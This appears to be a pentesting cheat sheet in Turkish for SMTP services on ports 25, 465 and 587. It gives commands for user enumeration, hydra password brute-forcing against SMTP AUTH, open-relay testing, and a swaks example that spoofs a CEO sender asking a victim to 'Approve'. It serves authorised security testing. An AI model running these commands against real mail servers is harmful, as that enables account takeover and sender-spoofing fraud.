Skip to content

25,465,587 - Pentesting SMTP/s

network smtp

SMTP (25), SMTPS (465) ve submission (587) mail yüzeyidir. Banner, VRFY/EXPN/RCPT enum, open relay ve AUTH brute klasik kazanımlardır; smuggling ayrı zincirdir.

  1. 25/465/587 açık mı, STARTTLS/AUTH ne sunuyor bak.

  2. VRFY/EXPN/RCPT ile kullanıcı enum yap.

  3. AUTH brute ve open relay hipotezlerini doğrula.

  4. Spoof / smuggling için DATA terminator varyantlarına geç.

Terminal window
nmap -Pn -sV -p25,465,587 --script smtp-commands,smtp-enum-users,smtp-open-relay TARGET
Terminal window
nc -nv TARGET 25
Terminal window
openssl s_client -connect TARGET:465 -crlf
Terminal window
openssl s_client -starttls smtp -connect TARGET:587 -crlf
EHLO pentest.local
VRFY root
MAIL FROM:<a@evil.com>
RCPT TO:<victim@corp.local>
Terminal window
smtp-user-enum -M VRFY -U users.txt -t TARGET
Terminal window
smtp-user-enum -M RCPT -U users.txt -t TARGET -f a@evil.com
Terminal window
hydra -L users.txt -P rockyou.txt smtp://TARGET
Terminal window
hydra -L users.txt -P rockyou.txt smtp://TARGET -s 587 -S
Terminal window
nmap -p25 --script smtp-open-relay TARGET
Terminal window
swaks --to external@gmail.com --from spoof@corp.local --server TARGET --body 'relay-test'
Terminal window
swaks --to victim@corp.local --from ceo@corp.local --server TARGET --header 'Subject: Urgent' --body 'Approve'
[ ] Banner + EHLO capabilities
[ ] VRFY/EXPN/RCPT enum
[ ] AUTH brute / geçerli hesap
[ ] Open relay doğrulandı veya elendi
[ ] Smuggling için smtp-smuggling sayfasına geçildi